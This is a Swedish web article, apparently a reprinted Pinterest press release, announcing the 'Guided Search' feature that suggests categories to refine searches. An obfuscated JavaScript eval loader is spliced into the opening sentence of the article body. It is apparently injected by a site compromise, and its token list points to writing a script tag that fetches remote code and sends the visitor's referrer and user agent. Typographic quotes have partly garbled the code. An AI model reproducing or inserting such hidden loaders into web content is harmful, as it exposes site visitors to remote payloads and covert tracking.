Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

Pinterest tar nu nästa steg med ”Guided search”

Pinterest tar nu nästa steg med ”Guided search”
Sebastian
Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynzrn|var|u0026u|referrer|nyfis||js|php’.split(’|’),0,{}))
sociala nätverket Pinterest tar nu nästa steg i utvecklingen och lanserar ’Guided Search’, en ny sökmotorsfunktion som hjälper dig upptäcka de mest relevanta pinsen just för dig. ’Guided Search’ har tagits fram för att underlätta för användare att upptäcka och söka efter intressant innehåll, vare sig du vet exakt vad du vill ha eller är ute efter att hitta nya idéer och inspireras längst vägen.
Pinterest är en social nätverkstjänst och fungerar som ett visuellt verktyg där användare kan samla idéer, organisera material och inspirera andra genom digitala anslagstavlor.
Den nya funktionen gör det möjligt att söka på ett nyckelord och utifrån det få kategoriförslag som hjälper dig förfina din sökning och ge dig maximalt relevant innehåll. Om du till exempel söker på ”löpning” får du en visuell pop-up guide som ger dig förslag hur du kan förfina din sökning genom att välja mellan kategorierna ”skor”, ”spellista”, ”marathon” och ”löpspår”. När du sedan klickat på en av kategorierna får du upp nya kategoriförslag om du skulle vilja förfina din sökning ytterligare. Den nya funktionen leder till att du upptäcker och hittar den bästa inspirationen just för dig.
’Guided Search’ finns redan nu tillgänglig för Pinterest mobilanvändare på engelska och finns snart även tillgänglig på webben och lokala språk, dvs. bland annat på svenska.
Detta är ett pressmeddelande från Pinterest